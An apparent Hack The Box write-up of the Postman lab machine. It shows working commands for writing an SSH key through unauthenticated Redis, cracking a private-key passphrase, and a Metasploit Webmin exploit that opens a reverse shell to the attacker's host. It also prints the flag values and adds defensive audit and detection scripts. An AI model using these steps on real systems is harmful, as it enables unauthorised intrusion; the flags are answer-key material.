
Hack The Box Write-Up Postman - 10.10.10.160

A hacker does for love what others would not do for money.

Laura Creighton

About Postman

In this post I write up the machine Postman from Hack The Box. Hack The Box is an online platform for training your ethical hacking and penetration testing skills.

Postman is an ‘Easy’ rated box. Submitting the user.txt flag raises your points by 10 and submitting the root flag raises them by 20.

Machine Info

hackthebox-postman-machine-info

hackthebox-postman-machine-ip-and-creator

Enumeration

Portscan (Nmap)

First, I start with a port scan using Nmap. My initial Nmap scan missed port 6379, so I scanned the target again with the port range 1-10000.

~$ nmap -p 1-10000 -sC -sV -oA ./nmap/postman.txt 10.10.10.160

The results:

Nmap scan report for 10.10.10.160
Host is up (0.033s latency).
Scanned at 2020-02-07 20:51:34 CET for 2957s
Not shown: 9965 closed ports
PORT      STATE    SERVICE        VERSION
22/tcp    open     ssh            OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open     http           Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp  open     redis          Redis key-value store 4.0.9
10000/tcp open     http           MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
| ndmp-version:
|_  ERROR: Failed to get host information from server
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read from /usr/bin/../share/nmap: nmap-payloads nmap-service-probes nmap-services.
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Feb  7 21:40:51 2020 -- 1 IP address (1 host up) scanned in 2958.40 seconds

There are four open ports:

  • 22/tcp (SSH, OpenSSH 7.6p1)
  • 80/tcp (HTTP, Apache httpd 2.4.29)
  • 6379/tcp (Redis 4.0.9)
  • 10000/tcp (HTTP, MiniServ 1.910 / Webmin)

Enumeration Web Server

I start by enumerating the web server and visit the website on http://10.10.10.160. I land on a good-looking personal web page of The Cyber Geek, and it seems that I’m welcome.

hackthebox-postman-http-80.png

I looked through the website, but there are no usable pages. There is a username, postman@htb, listed in the information bar at the bottom. With wfuzz I tried some wordlists and found some default folders, but nothing juicy. There is also a higher port open, so let’s check that one.

Enumeration Webmin

I visited the following web page: http://10.10.10.160:10000. There is a message that this site has to be visited over HTTPS, so I changed the protocol and visited https://10.10.10.160:10000/. And I have a login page.

hackthebox-postman-webadmin

Webmin on https://10.10.10.160:10000

There is nothing to see on this web page either. I need valid credentials to log in, and I don’t have any yet. On to the next port, 6379.

Enumerate Redis

Redis 4.0.9 is installed on this box, and a Redis instance that accepts connections without AUTH is vulnerable to unauthenticated code execution. I searched the internet for an exploit and came up with this page: https://packetstormsecurity.com/files/134200/Redis-Remote-Command-Execution.html. To check whether authentication is required, I invoked the commands below:

~$ telnet 10.10.10.160 6379
Trying 10.10.10.160...
Connected to 10.10.10.160.
Escape character is '^]'.
echo "Hey no AUTH required!"
$21
Hey no AUTH required!
quit
+OK
Connection closed by foreign host.

This works: no authentication is needed. Redis is installed unprotected, without any password. Let’s exploit this vulnerability!
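As an added example that is not part of this write-up, here is a small Python audit of the Redis settings that make this possible. It parses a redis.conf and reports the weaknesses that together allow an unauthenticated client to reconfigure and dump the database: no requirepass, a wildcard bind, protected-mode switched off, and the CONFIG command still reachable. Both configs in the script are constructed (the password is a placeholder); the directive names are real Redis directives.

```python
"""Audit a redis.conf for the weaknesses that make a Redis instance such as
the one on this box (4.0.9, no AUTH) writable by any network client.
Added example, not the write-up's code. The two configs are constructed;
the directive names are real Redis directives."""
from typing import Dict, List

# Constructed: what an exposed, passwordless instance could look like.
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
port 6379
dir /var/lib/redis
"""

# Constructed: the same instance hardened. The placeholder must be replaced
# with a real, long secret.
HARDENED_CONF = """
bind 127.0.0.1
protected-mode yes
port 6379
requirepass <strong-passphrase-placeholder>
rename-command CONFIG ""
dir /var/lib/redis
"""


def parse_conf(text: str) -> Dict[str, List[str]]:
    """Map each directive to the list of argument strings it was given.

    A directive may repeat (rename-command usually does), so values are lists
    and the last occurrence of a single-valued directive wins."""
    conf: Dict[str, List[str]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        name, _, rest = line.partition(" ")
        conf.setdefault(name.lower(), []).append(rest.strip())
    return conf


def audit(text: str) -> List[str]:
    """Return one finding per weakness; an empty list means all checks passed."""
    conf = parse_conf(text)
    findings: List[str] = []

    # 1. requirepass: without it every client that reaches the port may run
    #    CONFIG SET and SAVE, which is exactly the chain used in the write-up.
    if not conf.get("requirepass") or conf["requirepass"][-1] == "":
        findings.append("requirepass is unset: unauthenticated clients are accepted")

    # 2. bind: no bind line, or a wildcard address, exposes Redis to the network.
    binds = conf.get("bind", [])
    if not binds or any(addr in ("0.0.0.0", "*", "::") for b in binds for addr in b.split()):
        findings.append("bind allows non-loopback access")

    # 3. protected-mode (Redis 3.2+) refuses remote clients when no password is
    #    set; the default is yes, so only an explicit "no" is a finding.
    if conf.get("protected-mode", ["yes"])[-1].lower() != "yes":
        findings.append("protected-mode is disabled")

    # 4. rename-command CONFIG "" removes the command that rewrites dir and
    #    dbfilename, so a client cannot redirect the dump file anywhere.
    disabled = {r.split()[0].upper() for r in conf.get("rename-command", [])
                if len(r.split()) == 2 and r.split()[1] == '""'}
    if "CONFIG" not in disabled:
        findings.append("CONFIG command is reachable by clients")
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"{label}: {audit(conf) or 'no findings'}")
```

Renaming CONFIG to an empty string disables it for every client, which also blocks legitimate runtime reconfiguration; on an instance that needs that, rename it to an unguessable name instead and rely on requirepass plus a loopback bind as the primary controls.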

Exploitation

Unauthenticated code execution

Redis can be told where to write its database dump, so I can write files to this box without any authentication. Let’s create a new SSH key pair. I invoked the command below:

~$ ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /home/htb/boxes/machines/postman/id_rsa
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/htb/boxes/machines/postman/id_rsa.
Your public key has been saved in /home/htb/boxes/machines/postman/id_rsa.pub.
The key fingerprint is:
SHA256:ZGnXXxEXku0kHb5YIhcPsW4xC3W+WuVNrYY5w28dVh0 root@kali
The key's randomart image is:
+---[RSA 3072]----+
|             *=E=|
|         . ..oX+*|
|        = .o.*+=B|
|       + . .=+B**|
|        S   *=+*o|
|            .=+..|
|             .o .|
|             .   |
|                 |
+----[SHA256]-----+

I created this RSA key pair without a passphrase. Now I’ve got the key. The public key has to be put into the memory of the Redis instance on this box and then written to disk in the RDB format. I copied id_rsa.pub to a text file and added "\n\n at the front and \n\n" at the end, so that the key ends up on its own line inside the dump; the contents of this file are shown below:

"\n\nssh-rsa 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 root@kali\n\n"

Now id_rsa.txt is just our public key padded with newlines. I copied the contents of this file to my clipboard, opened a telnet session and invoked the commands below to load the key into memory and have Redis save it as /var/lib/redis/.ssh/authorized_keys.

~$ telnet 10.10.10.160 6379
Trying 10.10.10.160...
Connected to 10.10.10.160.
Escape character is '^]'.
set s-key "\n\nssh-rsa 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 root@kali\n\n"
+OK
config set dir /var/lib/redis/.ssh
+OK
config set dbfilename authorized_keys
+OK
save
+OK
quit
+OK
Connection closed by foreign host.

Everything looks good. Now I try to open an SSH session to this box. If everything was set up properly, I get a session without entering any password.

~$ ssh -i ./id_rsa redis@10.10.10.160
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Fri Feb  7 22:04:13 2020 from 10.10.14.183
redis@Postman:~$

I now have an SSH session on this box as the user redis!

redis@Postman:~$ whoami
redis
redis@Postman:~$ pwd
/var/lib/redis
redis@Postman:~$
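Redis itself logs a SAVE only as "DB saved on disk", so the reconfiguration above leaves little trace in redis-server.log. The MONITOR command (or a capture of the Redis protocol on the wire) does show every command together with the issuing client, and the Python script below, added here as an example and not part of the original post, flags a client that moves dir or dbfilename and then forces a dump. The MONITOR lines are constructed in MONITOR's real output format; the client address 10.10.14.183 is the one from the box's "Last login" line, the other client and the expected data directory are assumptions.

```python
"""Spot the dump-file redirection from the write-up (CONFIG SET dir,
CONFIG SET dbfilename, then SAVE) in the output of Redis' MONITOR command.
Added example, not from the original post. The MONITOR lines are constructed
in the real MONITOR format: <unix time> [<db> <client ip:port>] "CMD" "arg" ..."""
import re
from typing import Dict, List, Optional

EXPECTED_DIR = "/var/lib/redis"  # assumed: the instance's configured data directory

# Constructed sample: a normal client, then a client that redirects the RDB
# dump into a non-.rdb file and forces a SAVE, then the normal client saving.
SAMPLE_MONITOR = """\
1581106800.100000 [0 10.10.14.5:50001] "GET" "session:42"
1581106801.200000 [0 10.10.14.183:41000] "SET" "s-key" "\\n\\nssh-rsa AAAA...constructed...\\n\\n"
1581106802.300000 [0 10.10.14.183:41000] "CONFIG" "SET" "dir" "/var/lib/redis/.ssh"
1581106803.400000 [0 10.10.14.183:41000] "CONFIG" "SET" "dbfilename" "authorized_keys"
1581106804.500000 [0 10.10.14.183:41000] "SAVE"
1581106805.600000 [0 10.10.14.5:50001] "SAVE"
"""

LINE_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<rest>.+)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')  # MONITOR double-quotes every argument


def parse_line(line: str) -> Optional[dict]:
    """Split one MONITOR line into timestamp, client and command; None if it is not one."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    args = ARG_RE.findall(m.group("rest"))
    if not args:
        return None
    return {"ts": float(m.group("ts")), "client": m.group("client"),
            "cmd": args[0].upper(), "args": args[1:]}


def detect(monitor_text: str) -> List[dict]:
    """Return one alert per SAVE/BGSAVE issued by a client that first moved the dump target.

    State is kept per client connection, so a legitimate SAVE from another
    client (last sample line) is not blamed for someone else's CONFIG SET."""
    per_client: Dict[str, Dict[str, str]] = {}
    alerts: List[dict] = []
    for line in monitor_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        st = per_client.setdefault(ev["client"], {})
        if ev["cmd"] == "CONFIG" and len(ev["args"]) == 3 and ev["args"][0].upper() == "SET":
            key = ev["args"][1].lower()
            if key in ("dir", "dbfilename"):
                st[key] = ev["args"][2]
        elif ev["cmd"] in ("SAVE", "BGSAVE"):
            reasons = []
            if "dir" in st and st["dir"] != EXPECTED_DIR:
                reasons.append(f"dir moved to {st['dir']}")
            if "dbfilename" in st and not st["dbfilename"].endswith(".rdb"):
                reasons.append(f"dbfilename {st['dbfilename']} is not an .rdb file")
            if reasons:
                alerts.append({"ts": ev["ts"], "client": ev["client"],
                               "dir": st.get("dir"), "dbfilename": st.get("dbfilename"),
                               "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_MONITOR):
        print(f"{a['ts']} {a['client']}: {'; '.join(a['reasons'])}")
```

MONITOR costs throughput on a busy instance, so this is a tool for an investigation or a tap on a segment you already suspect, not something to leave running; the cheaper standing control is the one from the audit above, keeping CONFIG out of reach of clients in the first place.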

Enumeration on user

I have an active session on this box. Let’s poke around and see whether I can find user.txt. There is a home folder for the user Matt, but it seems that the user redis is not allowed to read the user.txt file.

redis@Postman:~$ cd /home/
redis@Postman:/home$ ls
Matt
redis@Postman:/home$ cd Matt/
redis@Postman:/home/Matt$ ls
user.txt
redis@Postman:/home/Matt$ cat user.txt 
cat: user.txt: Permission denied
redis@Postman:/home/Matt$

It took me some hours of searching and poking around, and it was driving me insane that I couldn’t find anything useful. After a little walk outside, I decided to put my knowledge from previous boxes to the test and tried the grep command to search for useful files. As grep was not working out on this machine, I tried the find command instead. After some searching I couldn’t believe my eyes: I had found a backup of a private key!

redis@Postman:/$ find . -name "id_rsa*" -print -quit
./opt/id_rsa.bak

This has to be the private key of the user Matt!

redis@Postman:/opt$ cat id_rsa.bak 
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C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-----END RSA PRIVATE KEY-----

I copied the content to the file id_rsa.bak on my Kali machine and gave it to ssh2john:

~# python ssh2john.py id_rsa.bak 
id_rsa.bak:$sshng$0$8$73E9CEFBCCF5287C$1192$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

I placed this hash in ssh_password.txt and let john crack the passphrase:

~# john ssh_pssword.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008     (id_rsa.bak)

That’s an easy passphrase. Let’s try to connect with ssh as Matt using this key. It turns out that Matt is not permitted to log in through SSH. After all those hours of work this was a hard disappointment, and I needed a cup of coffee to get myself back under control before I could go on.
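The reason john got through this so quickly is visible in its own output: "KDF/cipher ... 1=MD5/3DES". A PEM key with a DEK-Info header is encrypted the OpenSSL way, with a single MD5 round as key derivation, so every rockyou candidate costs little more than one MD5 and a short decryption. The Python script below, an added example rather than anything from this write-up, classifies a private key file by how its passphrase is protected and flags the ones that should be re-encrypted into the OpenSSH native format (bcrypt KDF, via ssh-keygen -p -o -a 100). The legacy sample reuses only the header lines of id_rsa.bak; the OpenSSH samples are constructed stubs with no real key material.

```python
"""Classify how an SSH private key file protects its passphrase.
Added example, not part of the write-up. The key bodies are constructed
stubs (no real key material): the legacy one copies the header lines of
/opt/id_rsa.bak from the box, the OpenSSH ones are built by make_openssh_stub."""
import base64
import struct
from typing import Dict, Optional

# Constructed: same headers as the backup key found on the box. "DEK-Info"
# marks OpenSSL-style PEM encryption, whose key derivation is a single MD5
# round (john reports it as "MD5/3DES"), so a wordlist attack is cheap.
LEGACY_PEM = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C

<constructed placeholder body>
-----END RSA PRIVATE KEY-----
"""

ADVICE = "re-encrypt with: ssh-keygen -p -o -a 100 -f <key file>"


def _string(b: bytes) -> bytes:
    """Encode bytes as an SSH string (uint32 big-endian length + data)."""
    return struct.pack(">I", len(b)) + b


def _read_string(buf: bytes, off: int):
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def make_openssh_stub(cipher: str, kdf: str, rounds: int) -> str:
    """Build just the prefix of an openssh-key-v1 blob (magic, cipher, kdf, kdf options).

    Real files continue with the key count and key data; the classifier only
    reads this prefix, so the stub is enough to exercise it."""
    kdfopts = _string(b"\x00" * 16) + struct.pack(">I", rounds) if kdf == "bcrypt" else b""
    blob = b"openssh-key-v1\x00" + _string(cipher.encode()) + _string(kdf.encode()) + _string(kdfopts)
    b64 = base64.b64encode(blob).decode()
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{b64}\n-----END OPENSSH PRIVATE KEY-----\n"


def parse_openssh_header(body_b64: str) -> Dict[str, Optional[object]]:
    """Read cipher name, KDF name and bcrypt rounds from an openssh-key-v1 blob."""
    raw = base64.b64decode(body_b64)
    magic = b"openssh-key-v1\x00"
    if not raw.startswith(magic):
        raise ValueError("not an openssh-key-v1 blob")
    cipher, off = _read_string(raw, len(magic))
    kdf, off = _read_string(raw, off)
    kdfopts, _ = _read_string(raw, off)
    rounds = None
    if kdf == b"bcrypt":
        _salt, o = _read_string(kdfopts, 0)  # kdfoptions = string salt, uint32 rounds
        (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
    return {"cipher": cipher.decode(), "kdf": kdf.decode(), "rounds": rounds}


def classify_key(text: str) -> Dict[str, object]:
    """Return format, protection and whether the file should be re-encrypted (weak)."""
    lines = [l.strip() for l in text.strip().splitlines()]
    if len(lines) < 2 or not lines[0].startswith("-----BEGIN ") or not lines[-1].startswith("-----END "):
        return {"format": "unknown", "protection": "unknown", "weak": True, "advice": "not a PEM-style key file"}
    if "OPENSSH PRIVATE KEY" in lines[0]:
        info = parse_openssh_header("".join(lines[1:-1]))
        if info["cipher"] == "none":
            return {"format": "openssh", "protection": "none", "weak": True, "advice": ADVICE}
        rounds = info["rounds"]
        weak = rounds is not None and rounds < 16  # 16 is ssh-keygen's default -a value
        return {"format": "openssh", "protection": f"{info['kdf']}/{info['cipher']}",
                "rounds": rounds, "weak": weak, "advice": ADVICE if weak else ""}
    headers = lines[1:4]
    if any(h.startswith("Proc-Type: 4,ENCRYPTED") for h in headers):
        dek = next((h for h in headers if h.startswith("DEK-Info:")), "DEK-Info: ?")
        cipher = dek.split(":", 1)[1].strip().split(",")[0]
        return {"format": "pem", "protection": f"md5-1-round/{cipher}", "weak": True, "advice": ADVICE}
    return {"format": "pem", "protection": "none", "weak": True, "advice": ADVICE}


if __name__ == "__main__":
    for sample in (LEGACY_PEM, make_openssh_stub("aes256-ctr", "bcrypt", 100)):
        print(classify_key(sample))
```

Run over every id_rsa* a find like the one above turns up, this separates keys that merely need a stronger passphrase from keys whose file format makes any passphrase cheap to guess; the stray backup copy in /opt is a finding on its own, whatever its format.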

Get user.txt

I logged back in as redis. Maybe I can switch to Matt with the su Matt command and the cracked passphrase? And indeed, it is possible to switch accounts and grab the user flag!

sudo: unable to initialize policy plugin
redis@Postman:~$ su Matt
Password: 
Matt@Postman:/var/lib/redis$ cat /home/Matt/user.txt 
517ad0ec2458ca97af8d93aac08a2f3c
Matt@Postman:/var/lib/redis$

It’s still very exciting to grab the user flag.

Exploit Webmin (Metasploit)

Now on to root! I feel like there has been a horse in the living room for hours and we haven’t done anything about it… The name of the horse: Webmin. I go back to the Webmin portal on https://10.10.10.160:10000 and log in as Matt.

hackthebox-postman-webadmin-exploit

Matt has access to the Software Package Updates

Matt has access to the Software Package Updates module, and I found an exploit for it on the internet: https://www.exploit-db.com/exploits/46984. There is a Metasploit module for this vulnerability, so I started msfconsole, exploited Webmin and grabbed the root.txt flag.

msf5 > use exploit/linux/http/web
use exploit/linux/http/webcalendar_settings_exec  use exploit/linux/http/webid_converter  use exploit/linux/http/webmin_backdoor  use exploit/linux/http/webmin_packageup_rce
msf5 > use exploit/linux/http/webmin_packageup_rce
msf5 exploit(linux/http/webmin_packageup_rce) > set rhosts 10.10.10.160
rhosts => 10.10.10.160
msf5 exploit(linux/http/webmin_packageup_rce) > set username Matt
username => Matt
msf5 exploit(linux/http/webmin_packageup_rce) > set password computer2008
password => computer2008
msf5 exploit(linux/http/webmin_packageup_rce) > set ssl true
ssl => true
msf5 exploit(linux/http/webmin_packageup_rce) > set lhost 10.10.15.62
lhost => 10.10.15.62
msf5 exploit(linux/http/webmin_packageup_rce) > exploit

[*] Started reverse TCP handler on 10.10.15.62:4444
[+] Session cookie: af1882183da1a304a49faf5183463233
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.15.62:4444 -> 10.10.10.160:41504) at 2020-02-08 00:23:06 +0100
shell
[*] Trying to find binary(python) on target machine
[*] Found python at
[*] Using `python` to pop up an interactive shel
cat /root/root.txt
a257741c5bed8be7778c6ed95686ddce

Thanks for reading this write-up! Did you enjoy reading this write-up? Or learned something from it? Please consider spending a respect point: https://app.hackthebox.com/profile/224856. Thanks!

Happy Hacking :-)

This post is licensed under CC BY 4.0 by the author.